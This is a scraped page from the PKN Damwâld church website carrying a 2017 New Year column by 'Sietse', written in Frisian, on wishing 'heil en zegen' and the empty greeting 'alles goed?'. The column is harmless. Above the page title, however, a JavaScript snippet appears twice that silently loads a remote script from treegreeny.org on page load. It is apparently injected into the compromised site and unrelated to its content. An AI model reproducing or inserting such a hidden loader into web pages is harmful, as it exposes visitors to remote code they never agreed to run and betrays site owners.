;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Veel heil en zegen…. - PKN Damwâld

Veel heil en zegen….

Gepubliceerd op: donderdag 5 januari 2017
Oftewol; Lok en Seine foar it nije jier!

Eltsenien om ùs hinne winskje wy it goede ta, lok of geluk en seine, ofwol zegen. En lit we wol wèze, as wy werklik gelokkich binne en de seine (fan God) komt der nog oerhinne, dan sil dat toch wol it ultieme leven wèze, Der kin gjin ”staatsloterij” tsjin op soe m’n sizze! Mar toch …… Veel heil en zegen; wy goaie it der oan’e “lopende” bân út yn it nije jier, mar wit we wol wat we sizze en wit de ûntfanger nog wol wat wy him of har yn wèzen tawinskje? Itselde fâlt mei op as minsken elkoar tsjinkomme en dan mar roppe’”Alles goed?”Jawis seit de oare, mei dy ek? Ja hjer, alles goed! Neffens in bekend sprekwurd hat elk “huisje zijn kruisje”dus tink ik dan; hoe sa; “alles goed”? As minsken my freegje ( en op it wurk is dat elke dei wol in kear as wat) Moarn Sietse, alles goed?!, dan sis ik faak; it measte wol!….. It measte wol?, wat is der mei dy oan e hân en faaks ek, hoe lang moast noch, is dan de ferskrikte reaktie. Mei oare wurden, do silst wol siik wèze of oars oan ein! (sechstich west!) En as ik dan sis, is mei dy alles goed, alles?….. . Dan komme der faaks hiel wat krupsjes of soargen oer de balie! Sa kaam ek in dûmny by de balie en begoun ek mei; Goedemorgen Sietse, alles goed!? Nee dûmny, antwurde ik,nee, alles net. Dûmny wie efkes stil, tocht nei en sei doe; Je hebt gelijk; Alles goed…. Dan waren we in het Paradijs!!. Ik koe net mear stikken by dy man!

Veel Heil en Zegen!

Columnist:Sietse

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns